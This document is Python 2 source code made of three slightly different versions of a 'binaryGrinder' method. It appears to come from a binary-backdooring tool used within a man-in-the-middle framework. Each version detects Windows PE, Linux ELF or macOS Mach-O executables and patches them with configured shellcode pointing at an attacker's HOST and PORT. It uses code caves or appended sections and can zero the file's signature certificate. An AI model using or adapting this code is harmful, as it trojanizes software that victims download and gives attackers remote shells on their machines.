def binaryGrinder(self, binaryFile): """ Feed potential binaries into this function, it will return the result PatchedBinary, False, or None """ with open(binaryFile, 'r+b') as f: binaryTMPHandle = f.read() binaryHeader = binaryTMPHandle[:4] result = None try: if binaryHeader[:2] == 'MZ': # PE/COFF pe = pefile.PE(data=binaryTMPHandle, fast_load=True) magic = pe.OPTIONAL_HEADER.Magic machineType = pe.FILE_HEADER.Machine #update when supporting more than one arch if (magic == int('20B', 16) and machineType == 0x8664 and self.WindowsType.lower() in ['all', 'x64']): add_section = False cave_jumping = False if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64['SHELL'], HOST=self.WindowsIntelx64['HOST'], PORT=int(self.WindowsIntelx64['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool( self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self. WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool( self.WindowsIntelx64['ZERO_CERT']), ) result = targetFile.run_this() elif (machineType == 0x14c and self.WindowsType.lower() in ['all', 'x86']): add_section = False cave_jumping = False #add_section wins for cave_jumping #default is single for BDF if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86['SHELL'], HOST=self.WindowsIntelx86['HOST'], PORT=int(self.WindowsIntelx86['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool( self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self. WindowsIntelx86['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool( self.WindowsIntelx86['ZERO_CERT'])) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() if targetFile.class_type == 0x1: #x86CPU Type targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx86['SHELL'], HOST=self.LinuxIntelx86['HOST'], PORT=int(self.LinuxIntelx86['PORT']), SUPPLIED_SHELLCODE=self. LinuxIntelx86['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType) result = targetFile.run_this() elif targetFile.class_type == 0x2: #x64 targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx64['SHELL'], HOST=self.LinuxIntelx64['HOST'], PORT=int(self.LinuxIntelx64['PORT']), SUPPLIED_SHELLCODE=self. LinuxIntelx64['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') in [ 'cefaedfe', 'cffaedfe', 'cafebabe' ]: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE if targetFile.FAT_FILE is True: if self.FatPriority == 'x86': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif self.FatPriority == 'x64': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() return result except Exception as e: print 'Exception', str(e) logging.warning("EXCEPTION IN binaryGrinder %s", str(e)) return None
def binaryGrinder(self, binaryFile): """ Feed potential binaries into this function, it will return the result PatchedBinary, False, or None """ with open(binaryFile, "r+b") as f: binaryTMPHandle = f.read() binaryHeader = binaryTMPHandle[:4] result = None try: if binaryHeader[:2] == "MZ": # PE/COFF pe = pefile.PE(data=binaryTMPHandle, fast_load=True) magic = pe.OPTIONAL_HEADER.Magic machineType = pe.FILE_HEADER.Machine # update when supporting more than one arch if magic == int("20B", 16) and machineType == 0x8664 and self.WindowsType.lower() in ["all", "x64"]: add_section = False cave_jumping = False if self.WindowsIntelx64["PATCH_TYPE"].lower() == "append": add_section = True elif self.WindowsIntelx64["PATCH_TYPE"].lower() == "jump": cave_jumping = True # if automatic override if self.WindowsIntelx64["PATCH_METHOD"].lower() == "automatic": cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64["SHELL"], HOST=self.WindowsIntelx64["HOST"], PORT=int(self.WindowsIntelx64["PORT"]), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64["PATCH_DLL"]), SUPPLIED_SHELLCODE=self.WindowsIntelx64["SUPPLIED_SHELLCODE"], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64["ZERO_CERT"]), PATCH_METHOD=self.WindowsIntelx64["PATCH_METHOD"].lower(), ) result = targetFile.run_this() elif machineType == 0x14C and self.WindowsType.lower() in ["all", "x86"]: add_section = False cave_jumping = False # add_section wins for cave_jumping # default is single for BDF if self.WindowsIntelx86["PATCH_TYPE"].lower() == "append": add_section = True elif self.WindowsIntelx86["PATCH_TYPE"].lower() == "jump": cave_jumping = True # if automatic override if self.WindowsIntelx86["PATCH_METHOD"].lower() == "automatic": cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86["SHELL"], HOST=self.WindowsIntelx86["HOST"], PORT=int(self.WindowsIntelx86["PORT"]), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86["PATCH_DLL"]), SUPPLIED_SHELLCODE=self.WindowsIntelx86["SUPPLIED_SHELLCODE"], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86["ZERO_CERT"]), PATCH_METHOD=self.WindowsIntelx86["PATCH_METHOD"].lower(), ) result = targetFile.run_this() elif binaryHeader[:4].encode("hex") == "7f454c46": # ELF targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() if targetFile.class_type == 0x1: # x86CPU Type targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx86["SHELL"], HOST=self.LinuxIntelx86["HOST"], PORT=int(self.LinuxIntelx86["PORT"]), SUPPLIED_SHELLCODE=self.LinuxIntelx86["SUPPLIED_SHELLCODE"], IMAGE_TYPE=self.LinuxType, ) result = targetFile.run_this() elif targetFile.class_type == 0x2: # x64 targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx64["SHELL"], HOST=self.LinuxIntelx64["HOST"], PORT=int(self.LinuxIntelx64["PORT"]), SUPPLIED_SHELLCODE=self.LinuxIntelx64["SUPPLIED_SHELLCODE"], IMAGE_TYPE=self.LinuxType, ) result = targetFile.run_this() elif binaryHeader[:4].encode("hex") in ["cefaedfe", "cffaedfe", "cafebabe"]: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() # ONE CHIP SET MUST HAVE PRIORITY in FAT FILE if targetFile.FAT_FILE is True: if self.FatPriority == "x86": targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86["SHELL"], HOST=self.MachoIntelx86["HOST"], PORT=int(self.MachoIntelx86["PORT"]), SUPPLIED_SHELLCODE=self.MachoIntelx86["SUPPLIED_SHELLCODE"], FAT_PRIORITY=self.FatPriority, ) result = targetFile.run_this() elif self.FatPriority == "x64": targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64["SHELL"], HOST=self.MachoIntelx64["HOST"], PORT=int(self.MachoIntelx64["PORT"]), SUPPLIED_SHELLCODE=self.MachoIntelx64["SUPPLIED_SHELLCODE"], FAT_PRIORITY=self.FatPriority, ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]["CPU Type"] == "0x7": targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86["SHELL"], HOST=self.MachoIntelx86["HOST"], PORT=int(self.MachoIntelx86["PORT"]), SUPPLIED_SHELLCODE=self.MachoIntelx86["SUPPLIED_SHELLCODE"], FAT_PRIORITY=self.FatPriority, ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]["CPU Type"] == "0x1000007": targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64["SHELL"], HOST=self.MachoIntelx64["HOST"], PORT=int(self.MachoIntelx64["PORT"]), SUPPLIED_SHELLCODE=self.MachoIntelx64["SUPPLIED_SHELLCODE"], FAT_PRIORITY=self.FatPriority, ) result = targetFile.run_this() self.patched.put(result) return except Exception as e: print "Exception", str(e) self.log.warning("EXCEPTION IN binaryGrinder {}".format(e)) return None
def binaryGrinder(self, binaryFile): """ Feed potential binaries into this function, it will return the result PatchedBinary, False, or None """ with open(binaryFile, 'r+b') as f: binaryTMPHandle = f.read() binaryHeader = binaryTMPHandle[:4] result = None try: if binaryHeader[:2] == 'MZ': # PE/COFF pe = pefile.PE(data=binaryTMPHandle, fast_load=True) magic = pe.OPTIONAL_HEADER.Magic machineType = pe.FILE_HEADER.Machine #update when supporting more than one arch if (magic == int('20B', 16) and machineType == 0x8664 and self.WindowsType.lower() in ['all', 'x64']): add_section = False cave_jumping = False if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': cave_jumping = True targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64['SHELL'], HOST=self.WindowsIntelx64['HOST'], PORT=int(self.WindowsIntelx64['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() ) result = targetFile.run_this() elif (machineType == 0x14c and self.WindowsType.lower() in ['all', 'x86']): add_section = False cave_jumping = False #add_section wins for cave_jumping #default is single for BDF if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': cave_jumping = True targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86['SHELL'], HOST=self.WindowsIntelx86['HOST'], PORT=int(self.WindowsIntelx86['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() ) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() if targetFile.class_type == 0x1: #x86CPU Type targetFile = elfbin.elfbin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx86['SHELL'], HOST=self.LinuxIntelx86['HOST'], PORT=int(self.LinuxIntelx86['PORT']), SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType ) result = targetFile.run_this() elif targetFile.class_type == 0x2: #x64 targetFile = elfbin.elfbin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx64['SHELL'], HOST=self.LinuxIntelx64['HOST'], PORT=int(self.LinuxIntelx64['PORT']), SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType ) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE if targetFile.FAT_FILE is True: if self.FatPriority == 'x86': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif self.FatPriority == 'x64': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() self.patched.put(result) return except Exception as e: print 'Exception', str(e) mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e)) return None